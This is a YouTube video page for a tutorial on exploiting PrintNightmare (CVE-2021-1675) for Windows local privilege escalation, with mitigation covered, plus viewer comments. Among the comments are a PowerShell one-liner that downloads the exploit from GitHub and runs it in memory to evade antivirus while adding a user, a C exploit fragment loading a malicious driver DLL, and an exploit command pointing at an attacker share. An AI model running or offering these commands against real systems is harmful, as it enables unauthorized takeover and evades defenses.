Abusing PrintNightmare (CVE-2021-1675) - Local Privilege Escalation

Infinite Logins
Infinite Logins
6,056
0
Published 2021-07-05
The exploit abuses the Print Spooler in Windows to load malicious DLL files. This video shows how this exploit is being used as a local privilege escalation, along with how to mitigate against these attacks. Check out the next video to see how this same vulnerability can be used for Remote Code Execution against a Domain Controller.

Disclaimer: This content is intended to be consumed by cyber security professionals, ethical hackers, and penetration testers. Any attacks performed in this video should only be performed in environments that you control or have explicit permission to perform them on.

Please consider sharing with a friend, hitting the like button, and subscribing!

Github Resources mentioned in this video:
github.com/calebstewart/CVE-2021-1675
github.com/cube0x0/CVE-2021-1675

Part Two:
   • Abusing PrintNightmare RCE (CVE-2021-...  

👇 SUBSCRIBE TO INFINITELOGINS YOUTUBE CHANNEL NOW 👇
youtube.com/c/infinitelogins?sub_confirmation=1

00:00 - Intro
00:50 - Exploits on Github
02:50 - Reviewing Environment
05:40 - Running Exploit
10:00 - Mitigation

___________________________________________
Social Media:
Website: infinitelogins.com/
Twitter: twitter.com/infinitelogins
Twitch: www.twitch.tv/infinitelogins

___________________________________________
Donations and Support:
Like my content? Please consider supporting me on Patreon:
www.patreon.com/infinitelogins

Purchase a VPN Using my Affiliate Link
www.privateinternetaccess.com/pages/buy-vpn/infini…

___________________________________________
#CVE #PrintNightmare #WindowsVulnerablility
All Comments (13)
  • @InfiniteLogins
    Part 2 show Remote Code Execution against a Domain Controller will be available today at 2 PM PDT - Check link in description!
  • @Dexterlex
    One thing would like to see within your channel is AV evasion and stuff like that anyways its great to watch your videos
  • @ARZ10198
    Nice explanation , Can the next video be about kerberos delegations ?
  • @bgrassguitarpicker
    When you run the script, do you have the "Point and Print" GPO enabled? Thank you
  • @kientran9766
    When i tried to connect user victim and password victim, it worked. However, I tried to connect that doesn't used password, it didnt worked. The command used: Python3 CVE........ domain/user:@ip victim '\\ipattacker\smb\*.dll ..... now, i can't connect if victim doesn't password.
  • @JSONSEC
    This isn't going to have any problems with YouTube censorship =p. Thanks for the videos tho, been searching around for the powershell script for this
  • @nexsploit4444
    Note - copying and pasting the actual script and writing it to disk will get picked up by AV (Windows Defender), so keep it in memory and do this instead so that it doesn't get picked up: iex(iwr https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1 -UseBasicParsing); Invoke-Nightmare -NewUser "User1" -NewPassword "password123" -DriverName "PrintMe" :) hope that helps
  • @bugsysiegals
    Is this really your typing speed? How many words per minute are you typing? LOL
  • @bugsysiegals
    While PS seems like a good idea, avoiding Linux, you'd be leaving footprints with PS history ... this doesn't seem ideal to me ...
  • @sbypasser819
    Everyone says it works on all versions of windows, BUT IT DOESNT WORK ON WINDOWS 7! This: DRIVER_INFO_2W di = {}; di.cVersion = 3; di.pName = (LPWSTR)L"1111"; di.pEnvironment = (LPWSTR)L"Windows x64"; di.pDataFile = (LPWSTR)DLL_PATH; di.pConfigFile = (LPWSTR)DLL_PATH; di.pDriverPath = (LPWSTR)L"C:\\Test\\UNIDRV.DLL"; AddPrinterDriverExW(0, 2, (PBYTE) & di, 0); This gives error 5 on win7, on win10 before 21h2 it works.